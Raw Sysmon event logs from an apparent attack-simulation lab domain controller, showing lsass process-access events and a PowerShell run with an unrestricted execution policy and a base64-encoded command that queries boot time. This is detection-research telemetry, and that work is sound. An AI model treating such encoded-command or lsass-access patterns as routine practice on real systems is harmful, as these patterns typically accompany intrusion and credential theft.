12:00:00.029{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.029{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.997{266CAFBE-643E-6064-D002-00000000AD01}3320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.982{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.982{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.175{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53835-false10.0.1.14win-dc-892.attackrange.local5986- 17141700x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:01.966{266CAFBE-6441-6064-E002-00000000AD01}4648\PSHost.132616656019009682.4648.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.951{266CAFBE-6441-6064-E002-00000000AD01}4648ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_o313xlvx.f4v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.951{266CAFBE-6441-6064-E002-00000000AD01}4648ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qz2awmkh.m1b.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.935{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qz2awmkh.m1b.ps12021-03-31 12:00:01.935 10341000x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.920{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.904{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.904{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.904{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-6441-6064-DF02-00000000AD01}49164612C:\Windows\system32\cmd.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.900{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 